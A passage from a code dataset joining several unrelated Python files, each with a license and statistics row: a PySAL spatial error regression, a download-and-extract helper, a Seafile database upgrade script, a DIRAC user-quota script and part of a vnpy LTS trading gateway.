['CONSTANT', 'RD90', 'PS90', 'UE90', 'DV90', 'lambda']
>>> mlerr.name_w #doctest: +SKIP
'south_q.gal'
>>> mlerr.name_ds #doctest: +SKIP
'south.dbf'
>>> mlerr.title #doctest: +SKIP
'MAXIMUM LIKELIHOOD SPATIAL ERROR (METHOD = FULL)'
"""
def __init__(self, y, x, w, method='full', epsilon=0.0000001,
spat_diag=False, vm=False, name_y=None, name_x=None,
name_w=None, name_ds=None):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
USER.check_weights(w, y, w_required=True)
x_constant = USER.check_constant(x)
method = method.upper()
BaseML_Error.__init__(self, y=y, x=x_constant,
w=w, method=method, epsilon=epsilon)
self.title = "MAXIMUM LIKELIHOOD SPATIAL ERROR" + \
" (METHOD = " + method + ")"
self.name_ds = USER.set_name_ds(name_ds)
self.name_y = USER.set_name_y(name_y)
self.name_x = USER.set_name_x(name_x, x)
self.name_x.append('lambda')
self.name_w = USER.set_name_w(name_w, w)
self.aic = DIAG.akaike(reg=self)
self.schwarz = DIAG.schwarz(reg=self)
SUMMARY.ML_Error(reg=self, w=w, vm=vm, spat_diag=spat_diag)
def err_c_loglik(lam, n, y, ylag, x, xlag, W):
# concentrated log-lik for error model, no constants, brute force
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
a = -lam * W
np.fill_diagonal(a, 1.0)
jacob = np.log(np.linalg.det(a))
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def err_c_loglik_sp(lam, n, y, ylag, x, xlag, I, Wsp):
# concentrated log-lik for error model, no constants, LU
if isinstance(lam, np.ndarray):
if lam.shape == (1,1):
lam = lam[0][0] #why does the interior value change?
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
a = I - lam * Wsp
LU = SuperLU(a.tocsc())
jacob = np.sum(np.log(np.abs(LU.U.diagonal())))
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def err_c_loglik_ord(lam, n, y, ylag, x, xlag, evals):
# concentrated log-lik for error model, no constants, eigenvalues
ys = y - lam * ylag
xs = x - lam * xlag
ysys = np.dot(ys.T, ys)
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
x1 = np.dot(xsxsi, xsys)
x2 = np.dot(xsys.T, x1)
ee = ysys - x2
sig2 = ee[0][0] / n
nlsig2 = (n / 2.0) * np.log(sig2)
revals = lam * evals
jacob = np.log(1 - revals).sum()
if isinstance(jacob, complex):
jacob = jacob.real
# this is the negative of the concentrated log lik for minimization
clik = nlsig2 - jacob
return clik
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
| bsd-3-clause | 8,266,917,768,889,439,000 | 6,212,989,230,600,351,000 | 35.480519 | 129 | 0.525556 | false |
electron/libchromiumcontent | script/lib/filesystem.py | 2 | 1582 | """Filesystem related helper functions.
"""
import contextlib
import errno
import os
import shutil
import sys
import tarfile
import tempfile
import urllib2
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def rm_f(path):
try:
os.remove(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def rm_rf(path):
try:
shutil.rmtree(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def safe_unlink(path):
try:
os.unlink(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def byte_to_mb(n):
return str(n / 1024 / 1024) + 'MB'
def download_and_extract(destination, url, verbose):
print url
with tempfile.TemporaryFile() as t:
with contextlib.closing(urllib2.urlopen(url)) as u:
total = int(u.headers['content-length'])
done = 0
last_length = 0
while True:
chunk = u.read(1024*1024)
done += len(chunk)
if not len(chunk):
break
if verbose:
percent = '{0:.2f}%'.format(round(float(done) / float(total), 4) * 100)
ratio = '(' + byte_to_mb(done) + '/' + byte_to_mb(total) + ')'
line = '-> ' + percent + ' ' + ratio
sys.stderr.write(line.ljust(last_length) + '\r')
last_length = len(line)
sys.stderr.flush()
t.write(chunk)
if verbose:
sys.stderr.write('\nExtracting...\n')
sys.stderr.flush()
with tarfile.open(fileobj=t, mode='r:bz2') as z:
z.extractall(destination)
| mit | 4,223,597,497,163,345,000 | -606,217,430,883,453,800 | 20.972222 | 81 | 0.59292 | false |
sharpdeep/seafile | scripts/upgrade/db_update_helper.py | 18 | 10798 | #coding: UTF-8
import sys
import os
import ConfigParser
import glob
HAS_MYSQLDB = True
try:
import MySQLdb
except ImportError:
HAS_MYSQLDB = False
HAS_SQLITE3 = True
try:
import sqlite3
except ImportError:
HAS_SQLITE3 = False
class EnvManager(object):
def __init__(self):
self.upgrade_dir = os.path.dirname(__file__)
self.install_path = os.path.dirname(self.upgrade_dir)
self.top_dir = os.path.dirname(self.install_path)
self.ccnet_dir = os.environ['CCNET_CONF_DIR']
self.seafile_dir = os.environ['SEAFILE_CONF_DIR']
env_mgr = EnvManager()
class Utils(object):
@staticmethod
def highlight(content, is_error=False):
'''Add ANSI color to content to get it highlighted on terminal'''
if is_error:
return '\x1b[1;31m%s\x1b[m' % content
else:
return '\x1b[1;32m%s\x1b[m' % content
@staticmethod
def info(msg):
print Utils.highlight('[INFO] ') + msg
@staticmethod
def error(msg):
print Utils.highlight('[ERROR] ') + msg
sys.exit(1)
@staticmethod
def read_config(config_path, defaults):
cp = ConfigParser.ConfigParser(defaults)
cp.read(config_path)
return cp
class MySQLDBInfo(object):
def __init__(self, host, port, username, password, db, unix_socket=None):
self.host = host
self.port = port
self.username = username
self.password = password
self.db = db
self.unix_socket = unix_socket
class DBUpdater(object):
def __init__(self, version, name):
self.sql_dir = os.path.join(env_mgr.upgrade_dir, 'sql', version, name)
@staticmethod
def get_instance(version):
'''Detect whether we are using mysql or sqlite3'''
ccnet_db_info = DBUpdater.get_ccnet_mysql_info()
seafile_db_info = DBUpdater.get_seafile_mysql_info()
seahub_db_info = DBUpdater.get_seahub_mysql_info()
if ccnet_db_info and seafile_db_info and seahub_db_info:
Utils.info('You are using MySQL')
if not HAS_MYSQLDB:
Utils.error('Python MySQLdb module is not found')
updater = MySQLDBUpdater(version, ccnet_db_info, seafile_db_info, seahub_db_info)
elif (ccnet_db_info is None) and (seafile_db_info is None) and (seahub_db_info is None):
Utils.info('You are using SQLite3')
if not HAS_SQLITE3:
Utils.error('Python sqlite3 module is not found')
updater = SQLiteDBUpdater(version)
else:
def to_db_string(info):
if info is None:
return 'SQLite3'
else:
return 'MySQL'
Utils.error('Error:\n ccnet is using %s\n seafile is using %s\n seahub is using %s\n'
% (to_db_string(ccnet_db_info),
to_db_string(seafile_db_info),
to_db_string(seahub_db_info)))
return updater
def update_db(self):
ccnet_sql = os.path.join(self.sql_dir, 'ccnet.sql')
seafile_sql = os.path.join(self.sql_dir, 'seafile.sql')
seahub_sql = os.path.join(self.sql_dir, 'seahub.sql')
if os.path.exists(ccnet_sql):
Utils.info('updating ccnet database...')
self.update_ccnet_sql(ccnet_sql)
if os.path.exists(seafile_sql):
Utils.info('updating seafile database...')
self.update_seafile_sql(seafile_sql)
if os.path.exists(seahub_sql):
Utils.info('updating seahub database...')
self.update_seahub_sql(seahub_sql)
@staticmethod
def get_ccnet_mysql_info():
ccnet_conf = os.path.join(env_mgr.ccnet_dir, 'ccnet.conf')
defaults = {
'HOST': '127.0.0.1',
'PORT': '3306',
'UNIX_SOCKET': '',
}
config = Utils.read_config(ccnet_conf, defaults)
db_section = 'Database'
if not config.has_section(db_section):
return None
type = config.get(db_section, 'ENGINE')
if type != 'mysql':
return None
try:
host = config.get(db_section, 'HOST')
port = config.getint(db_section, 'PORT')
username = config.get(db_section, 'USER')
password = config.get(db_section, 'PASSWD')
db = config.get(db_section, 'DB')
unix_socket = config.get(db_section, 'UNIX_SOCKET')
except ConfigParser.NoOptionError, e:
Utils.error('Database config in ccnet.conf is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
@staticmethod
def get_seafile_mysql_info():
seafile_conf = os.path.join(env_mgr.seafile_dir, 'seafile.conf')
defaults = {
'HOST': '127.0.0.1',
'PORT': '3306',
'UNIX_SOCKET': '',
}
config = Utils.read_config(seafile_conf, defaults)
db_section = 'database'
if not config.has_section(db_section):
return None
type = config.get(db_section, 'type')
if type != 'mysql':
return None
try:
host = config.get(db_section, 'host')
port = config.getint(db_section, 'port')
username = config.get(db_section, 'user')
password = config.get(db_section, 'password')
db = config.get(db_section, 'db_name')
unix_socket = config.get(db_section, 'unix_socket')
except ConfigParser.NoOptionError, e:
Utils.error('Database config in seafile.conf is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
@staticmethod
def get_seahub_mysql_info():
sys.path.insert(0, env_mgr.top_dir)
try:
import seahub_settings # pylint: disable=F0401
except ImportError, e:
Utils.error('Failed to import seahub_settings.py: %s' % e)
if not hasattr(seahub_settings, 'DATABASES'):
return None
try:
d = seahub_settings.DATABASES['default']
if d['ENGINE'] != 'django.db.backends.mysql':
return None
host = d.get('HOST', '127.0.0.1')
port = int(d.get('PORT', 3306))
username = d['USER']
password = d['PASSWORD']
db = d['NAME']
unix_socket = host if host.startswith('/') else None
except KeyError:
Utils.error('Database config in seahub_settings.py is invalid: %s' % e)
info = MySQLDBInfo(host, port, username, password, db, unix_socket)
return info
def update_ccnet_sql(self, ccnet_sql):
raise NotImplementedError
def update_seafile_sql(self, seafile_sql):
raise NotImplementedError
def update_seahub_sql(self, seahub_sql):
raise NotImplementedError
class CcnetSQLiteDB(object):
def __init__(self, ccnet_dir):
self.ccnet_dir = ccnet_dir
def get_db(self, dbname):
dbs = (
'ccnet.db',
'GroupMgr/groupmgr.db',
'misc/config.db',
'OrgMgr/orgmgr.db',
)
for db in dbs:
if os.path.splitext(os.path.basename(db))[0] == dbname:
return os.path.join(self.ccnet_dir, db)
class SQLiteDBUpdater(DBUpdater):
def __init__(self, version):
DBUpdater.__init__(self, version, 'sqlite3')
self.ccnet_db = CcnetSQLiteDB(env_mgr.ccnet_dir)
self.seafile_db = os.path.join(env_mgr.seafile_dir, 'seafile.db')
self.seahub_db = os.path.join(env_mgr.top_dir, 'seahub.db')
def update_db(self):
super(SQLiteDBUpdater, self).update_db()
for sql_path in glob.glob(os.path.join(self.sql_dir, 'ccnet', '*.sql')):
self.update_ccnet_sql(sql_path)
def apply_sqls(self, db_path, sql_path):
with open(sql_path, 'r') as fp:
lines = fp.read().split(';')
with sqlite3.connect(db_path) as conn:
for line in lines:
line = line.strip()
if not line:
continue
else:
conn.execute(line)
def update_ccnet_sql(self, sql_path):
dbname = os.path.splitext(os.path.basename(sql_path))[0]
self.apply_sqls(self.ccnet_db.get_db(dbname), sql_path)
def update_seafile_sql(self, sql_path):
self.apply_sqls(self.seafile_db, sql_path)
def update_seahub_sql(self, sql_path):
self.apply_sqls(self.seahub_db, sql_path)
class MySQLDBUpdater(DBUpdater):
def __init__(self, version, ccnet_db_info, seafile_db_info, seahub_db_info):
DBUpdater.__init__(self, version, 'mysql')
self.ccnet_db_info = ccnet_db_info
self.seafile_db_info = seafile_db_info
self.seahub_db_info = seahub_db_info
def update_ccnet_sql(self, ccnet_sql):
self.apply_sqls(self.ccnet_db_info, ccnet_sql)
def update_seafile_sql(self, seafile_sql):
self.apply_sqls(self.seafile_db_info, seafile_sql)
def update_seahub_sql(self, seahub_sql):
self.apply_sqls(self.seahub_db_info, seahub_sql)
def get_conn(self, info):
kw = dict(
user=info.username,
passwd=info.password,
db=info.db,
)
if info.unix_socket:
kw['unix_socket'] = info.unix_socket
else:
kw['host'] = info.host
kw['port'] = info.port
try:
conn = MySQLdb.connect(**kw)
except Exception, e:
if isinstance(e, MySQLdb.OperationalError):
msg = str(e.args[1])
else:
msg = str(e)
Utils.error('Failed to connect to mysql database %s: %s' % (info.db, msg))
return conn
def execute_sql(self, conn, sql):
cursor = conn.cursor()
try:
cursor.execute(sql)
conn.commit()
except Exception, e:
if isinstance(e, MySQLdb.OperationalError):
msg = str(e.args[1])
else:
msg = str(e)
Utils.error('Failed to execute sql: %s' % msg)
def apply_sqls(self, info, sql_path):
with open(sql_path, 'r') as fp:
lines = fp.read().split(';')
conn = self.get_conn(info)
for line in lines:
line = line.strip()
if not line:
continue
else:
self.execute_sql(conn, line)
def main():
version = sys.argv[1]
db_updater = DBUpdater.get_instance(version)
db_updater.update_db()
return 0
if __name__ == '__main__':
main()
| gpl-2.0 | 4,286,846,523,686,040,600 | 7,829,524,234,479,860 | 30.573099 | 97 | 0.562697 | false |
ic-hep/DIRAC | DataManagementSystem/scripts/dirac-admin-user-quota.py | 9 | 1201 | #!/usr/bin/env python
########################################################################
# $HeadURL$
########################################################################
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Show storage quotas for specified users or for all registered users if nobody is specified
Usage:
%s [user1 ...]
""" % Script.scriptName )
Script.parseCommandLine()
users = Script.getPositionalArgs()
from DIRAC import gLogger, gConfig
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
if not users:
res = gConfig.getSections( '/Registry/Users' )
if not res['OK']:
gLogger.error( "Failed to retrieve user list from CS", res['Message'] )
DIRAC.exit( 2 )
users = res['Value']
gLogger.notice( "-"*30 )
gLogger.notice( "%s|%s" % ( 'Username'.ljust( 15 ), 'Quota (GB)'.rjust( 15 ) ) )
gLogger.notice( "-"*30 )
for user in sorted( users ):
quota = gConfig.getValue( '/Registry/Users/%s/Quota' % user, 0 )
if not quota:
quota = gConfig.getValue( '/Registry/DefaultStorageQuota' )
gLogger.notice( "%s|%s" % ( user.ljust( 15 ), str( quota ).rjust( 15 ) ) )
gLogger.notice( "-"*30 )
DIRAC.exit( 0 )
| gpl-3.0 | 4,452,453,468,560,978,400 | 1,676,564,529,566,534,700 | 30.605263 | 90 | 0.591174 | false |
cmbclh/vnpy1.7 | vnpy/trader/gateway/ltsGateway/ltsGateway.py | 7 | 47839 | # encoding: UTF-8
'''
vn.lts的gateway接入
'''
import os
import json
from vnpy.api.lts import MdApi, QryApi, TdApi, defineDict
from vnpy.trader.vtFunction import getTempPath, getJsonPath
from vnpy.trader.vtGateway import *
# 以下为一些VT类型和LTS类型的映射字典
# 价格类型映射
priceTypeMap= {}
priceTypeMap[PRICETYPE_LIMITPRICE] = defineDict["SECURITY_FTDC_OPT_LimitPrice"]
priceTypeMap[PRICETYPE_MARKETPRICE] = defineDict["SECURITY_FTDC_OPT_AnyPrice"]
priceTypeMap[PRICETYPE_FAK] = defineDict["SECURITY_FTDC_OPT_BestPrice"]
priceTypeMap[PRICETYPE_FOK] = defineDict["SECURITY_FTDC_OPT_AllLimitPrice"]
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# 方向类型映射
directionMap = {}
directionMap[DIRECTION_LONG] = defineDict["SECURITY_FTDC_D_Buy"]
directionMap[DIRECTION_SHORT] = defineDict["SECURITY_FTDC_D_Sell"]
directionMapReverse = {v: k for k, v in directionMap.items()}
# 开平类型映射
offsetMap = {}
offsetMap[OFFSET_OPEN] = defineDict["SECURITY_FTDC_OF_Open"]
offsetMap[OFFSET_CLOSE] = defineDict["SECURITY_FTDC_OF_Close"]
offsetMap[OFFSET_CLOSETODAY] = defineDict["SECURITY_FTDC_OF_CloseToday"]
offsetMap[OFFSET_CLOSEYESTERDAY] = defineDict["SECURITY_FTDC_OF_CloseYesterday"]
offsetMapReverse = {v:k for k,v in offsetMap.items()}
# 交易所类型映射
exchangeMap = {}
exchangeMap[EXCHANGE_SSE] = 'SSE'
exchangeMap[EXCHANGE_SZSE] = 'SZE'
exchangeMap[EXCHANGE_HKEX] = 'HGE'
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}
# 持仓类型映射
posiDirectionMap = {}
posiDirectionMap[DIRECTION_NET] = defineDict["SECURITY_FTDC_PD_Net"]
posiDirectionMap[DIRECTION_LONG] = defineDict["SECURITY_FTDC_PD_Long"]
posiDirectionMap[DIRECTION_SHORT] = defineDict["SECURITY_FTDC_PD_Short"]
posiDirectionMapReverse = {v:k for k,v in posiDirectionMap.items()}
########################################################################################
class LtsGateway(VtGateway):
"""Lts接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='LTS'):
"""Constructor"""
super(LtsGateway, self).__init__(eventEngine, gatewayName)
self.mdApi = LtsMdApi(self)
self.tdApi = LtsTdApi(self)
self.qryApi = LtsQryApi(self)
self.mdConnected = False
self.tdConnected = False
self.qryConnected = False
self.qryEnabled = False # 是否要启动循环查询
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json 文件
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
userID = str(setting['userID'])
mdPassword = str(setting['mdPassword'])
tdPassword = str(setting['tdPassword'])
brokerID = str(setting['brokerID'])
tdAddress = str(setting['tdAddress'])
mdAddress = str(setting['mdAddress'])
qryAddress = str(setting['qryAddress'])
productInfo = str(setting['productInfo'])
authCode = str(setting['authCode'])
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 创建行情和交易接口对象
self.mdApi.connect(userID, mdPassword, brokerID, mdAddress)
self.tdApi.connect(userID, tdPassword, brokerID, tdAddress, productInfo, authCode)
self.qryApi.connect(userID, tdPassword, brokerID, qryAddress, productInfo, authCode)
# 初始化并启动查询
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
self.mdApi.subscribe(subscribeReq)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.tdApi.sendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.tdApi.cancelOrder(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.qryApi.qryAccount()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.qryApi.qryPosition()
#----------------------------------------------------------------------
def close(self):
"""关闭"""
if self.mdConnected:
self.mdApi.close()
if self.tdConnected:
self.tdApi.close()
if self.qryConnected:
self.qryApi.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount, self.qryPosition]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class LtsMdApi(MdApi):
"""Lts行情API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(LtsMdApi, self).__init__()
self.gateway = gateway #gateway对象
self.gatewayName = gateway.gatewayName #gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登陆状态
self.subscribedSymbols = set()
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接成功'
self.gateway.onLog(log)
self.login()
#----------------------------------------------------------------------
def onFrontDisconnected(self,n):
"""服务器断开"""
self.connectionStatus= False
self.loginStatus = False
self.gateway.mdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onHeartBeatWarning(self, n):
"""心跳报警"""
pass
#----------------------------------------------------------------------
def onRspError(self,error,n,last):
"""错误回报"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器登录完成'
self.gateway.onLog(log)
# 重新订阅之前订阅的合约
for subscribeReq in self.subscribedSymbols:
self.subscribe(subscribeReq)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspSubMarketData(self, data, error, n, last):
"""订阅合约回报"""
# 通常不在乎订阅错误,选择忽略
pass
#----------------------------------------------------------------------
def onRspUnSubMarketData(self, data, error, n, last):
"""退订合约回报"""
# 同上
pass
#----------------------------------------------------------------------
def onRtnDepthMarketData(self, data):
"""行情推送"""
tick = VtTickData()
tick.gatewayName = self.gatewayName
tick.symbol = data['InstrumentID']
tick.exchange = exchangeMapReverse.get(data['ExchangeID'], u'未知')
tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])
tick.lastPrice = data['LastPrice']
tick.volume = data['Volume']
tick.openInterest = data['OpenInterest']
tick.time = '.'.join([data['UpdateTime'], str(data['UpdateMillisec']/100)])
tick.date = data['TradingDay']
tick.openPrice = data['OpenPrice']
tick.highPrice = data['HighestPrice']
tick.lowPrice = data['LowestPrice']
tick.preClosePrice = data['PreClosePrice']
tick.upperLimit = data['UpperLimitPrice']
tick.lowerLimit = data['LowerLimitPrice']
# LTS有5档行情
tick.bidPrice1 = data['BidPrice1']
tick.bidVolume1 = data['BidVolume1']
tick.askPrice1 = data['AskPrice1']
tick.askVolume1 = data['AskVolume1']
tick.bidPrice2 = data['BidPrice2']
tick.bidVolume2 = data['BidVolume2']
tick.askPrice2 = data['AskPrice2']
tick.askVolume2 = data['AskVolume2']
tick.bidPrice3 = data['BidPrice3']
tick.bidVolume3 = data['BidVolume3']
tick.askPrice3 = data['AskPrice3']
tick.askVolume3 = data['AskVolume3']
tick.bidPrice4 = data['BidPrice4']
tick.bidVolume4 = data['BidVolume4']
tick.askPrice4 = data['AskPrice4']
tick.askVolume4 = data['AskVolume4']
tick.bidPrice5 = data['BidPrice5']
tick.bidVolume5 = data['BidVolume5']
tick.askPrice5 = data['AskPrice5']
tick.askVolume5 = data['AskVolume5']
self.gateway.onTick(tick)
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = getTempPath(self.gatewayName + '_')
self.createFtdcMdApi(path)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init()
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
req = {}
req['InstrumentID'] = str(subscribeReq.symbol)
req['ExchangeID'] = exchangeMap.get(str(subscribeReq.exchange), '')
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
if self.loginStatus:
self.subscribeMarketData(req)
self.subscribedSymbols.add(subscribeReq)
#----------------------------------------------------------------------
def login(self):
"""登录"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
########################################################################
class LtsTdApi(TdApi):
"""LTS交易API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""API对象的初始化函数"""
super(LtsTdApi, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.orderRef = EMPTY_INT # 订单编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登录状态
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
self.productInfo = EMPTY_STRING # 程序产品名称
self.authCode = EMPTY_STRING # 授权码
self.randCode = EMPTY_STRING # 随机码
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 会话编号
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接成功'
self.gateway.onLog(log)
# 前置机连接后,请求随机码
self.reqID += 1
self.reqFetchAuthRandCode({}, self.reqID)
#----------------------------------------------------------------------
def onFrontDisconnected(self, n):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onHeartBeatWarning(self, n):
""""""
pass
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.frontID = str(data['FrontID'])
self.sessionID = str(data['SessionID'])
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登录完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gateway
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspFetchAuthRandCode(self, data, error, n, last):
"""请求随机认证码"""
self.randCode = data['RandCode']
self.login()
#----------------------------------------------------------------------
def onRspUserPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspTradingAccountPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspOrderInsert(self, data, error, n, last):
"""发单错误(柜台)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspOrderAction(self, data, error, n, last):
"""撤单错误(柜台)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspError(self, error, n, last):
"""错误回报"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRtnOrder(self, data):
"""报单回报"""
# 更新最大报单编号
newref = data['OrderRef']
self.orderRef = max(self.orderRef, int(newref))
# 创建报单数据对象
order = VtOrderData()
order.gatewayName = self.gatewayName
# 保存代码和报单号
order.symbol = data['InstrumentID']
order.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
order.vtSymbol = '.'.join([order.symbol, order.exchange])
order.orderID = data['OrderRef']
# 方向
if data['Direction'] == '0':
order.direction = DIRECTION_LONG
elif data['Direction'] == '1':
